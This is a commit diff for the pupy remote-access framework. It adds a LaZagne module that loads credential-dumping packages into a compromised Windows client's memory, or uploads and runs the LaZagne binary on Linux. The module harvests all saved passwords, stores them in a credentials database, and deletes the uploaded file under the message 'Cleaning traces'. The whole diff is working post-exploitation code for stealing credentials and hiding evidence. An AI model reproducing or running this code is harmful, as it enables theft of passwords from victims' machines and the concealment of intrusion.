In-memory LaZagne module from AlessandroZ

This commit is contained in:
n1nj4sec 2016-08-24 19:30:02 +02:00
parent d00ed46a91
commit f0e60a7606
3 changed files with 89 additions and 37 deletions

4
.gitmodules vendored
View File

@ -10,3 +10,7 @@
path = pupy/external/LaZagne path = pupy/external/LaZagne
url = https://github.com/AlessandroZ/LaZagne url = https://github.com/AlessandroZ/LaZagne
shallow = true shallow = true
[submodule "pupy/external/impacket"]
path = pupy/external/impacket
url = https://github.com/CoreSecurity/impacket
shallow = true

1
pupy/external/impacket vendored Submodule

@ -0,0 +1 @@
Subproject commit 8af9271f656b6d420466f8bcaec8b81253388340

View File

@ -1,4 +1,6 @@
# -*- coding: UTF8 -*- # -*- coding: UTF8 -*-
# Author: AlessandroZ
from pupylib.PupyModule import * from pupylib.PupyModule import *
from pupylib.PupyCompleter import * from pupylib.PupyCompleter import *
from rpyc.utils.classic import upload from rpyc.utils.classic import upload
@ -6,6 +8,7 @@ from pupylib.utils.credentials import Credentials
import tempfile import tempfile
import subprocess import subprocess
import os.path import os.path
from pupylib.utils.rpyc_utils import redirected_stdo
__class_name__="LaZagne" __class_name__="LaZagne"
@ -16,56 +19,100 @@ class LaZagne(PupyModule):
""" """
def init_argparse(self): def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__) self.arg_parser = PupyArgumentParser(prog="lazagne", description=self.__doc__)
self.arg_parser.add_argument("-v", "--verbose", action='store_true')
def run(self, args): def run(self, args):
platform=self.client.desc["platform"] platform=self.client.desc["platform"]
isWindows = True
if "Windows" in platform: if "Windows" in platform:
lazagne_path = self.client.pupsrv.config.get("lazagne","win") if "64" in self.client.desc["proc_arch"]:
self.error('Not yet implemented for a x64 bits process, migrate to a 32 bits process and try again ! \nEx: run migrate -c \'C:\\Windows\\SysWOW64\\notepad.exe\'')
return
# load all dependency
self.client.load_dll(os.path.abspath(os.path.join(os.path.dirname(__file__),"..", "packages", "windows", "x86", "sqlite3.dll")))
self.client.load_package("sqlite3")
self.client.load_package("_sqlite3")
self.client.load_package("xml")
self.client.load_package("_elementtree")
self.client.load_package("pyexpat") # needed for _elementtree module
self.client.load_package("win32crypt")
self.client.load_package("win32api")
self.client.load_package("win32con")
self.client.load_package("win32cred")
self.client.load_package("colorama")
self.client.load_package("impacket")
self.client.load_package("calendar")
self.client.load_package("win32security")
self.client.load_package("win32net")
self.client.load_package("lazagne")
db = Credentials()
moduleNames = self.client.conn.modules["lazagne.config.manageModules"].get_modules()
for module in moduleNames:
if args.verbose:
self.info("running module %s"%(str(module).split(' ',1)[0].strip('<')))
passwords = module.run(module.options['dest'].capitalize())
self.print_results(module.options['dest'].capitalize(), passwords, db)
elif "Linux" in platform: elif "Linux" in platform:
isWindows = False isWindows = False
if "64" in self.client.desc["os_arch"]: if "64" in self.client.desc["os_arch"]:
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64") lazagne_path = self.client.pupsrv.config.get("lazagne","linux_64")
else: else:
lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32") lazagne_path = self.client.pupsrv.config.get("lazagne","linux_32")
else:
self.error("Platform not supported") if not os.path.isfile(lazagne_path):
return self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path)
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
return
tf = tempfile.NamedTemporaryFile()
dst = tf.name
tf.file.close()
if not os.path.isfile(lazagne_path): self.success("Uploading laZagne to: %s" % dst)
self.error("laZagne exe %s not found ! please edit laZagne section in pupy.conf"%lazagne_path) upload(self.client.conn, lazagne_path, dst)
self.error('Find releases on github: https://github.com/AlessandroZ/LaZagne/releases')
return
tf = tempfile.NamedTemporaryFile()
dst = tf.name
if isWindows:
remoteTempFolder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
tfName = tf.name.split(os.sep)
tfName = tfName[len(tfName)-1] + '.exe'
dst = self.client.conn.modules['os.path'].join(remoteTempFolder, tfName)
tf.file.close()
self.success("Uploading laZagne to: %s" % dst)
upload(self.client.conn, lazagne_path, dst)
if not isWindows:
self.success("Adding execution permission") self.success("Adding execution permission")
cmd = ["chmod", "+x", dst] cmd = ["chmod", "+x", dst]
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
self.success("Executing") self.success("Executing")
cmd = [dst, "all"] cmd = [dst, "all"]
output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE) output = self.client.conn.modules.subprocess.check_output(cmd, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
self.success("%s" % output) self.success("%s" % output)
creds = self.parse_output(output) creds = self.parse_output(output)
db = Credentials() db = Credentials()
db.add(creds) db.add(creds)
self.success("Passwords stored on the database") self.success("Passwords stored on the database")
self.success("Cleaning traces") self.success("Cleaning traces")
self.client.conn.modules['os'].remove(dst) self.client.conn.modules['os'].remove(dst)
else:
self.error("Platform not supported")
return
def print_results(self, module, creds, db):
if creds:
print "\n############## %s passwords ##############\n" % module
clean_creds = []
for cred in creds:
clean_cred = {}
clean_cred['Tool'] = 'Lazagne'
for c in cred.keys():
clean_cred[c] = cred[c].encode('utf-8')
print "%s: %s" % (c, cred[c])
print
clean_creds.append(clean_cred)
try:
db.add(clean_creds)
self.success("Passwords stored on the database")
except Exception, e:
print e
def parse_output(self, output): def parse_output(self, output):
creds = [] creds = []
@ -110,5 +157,5 @@ class LaZagne(PupyModule):
key, value = line.split(':', 1) key, value = line.split(':', 1)
cred[key] = value.strip() cred[key] = value.strip()
except: except:
pass pass
return creds return creds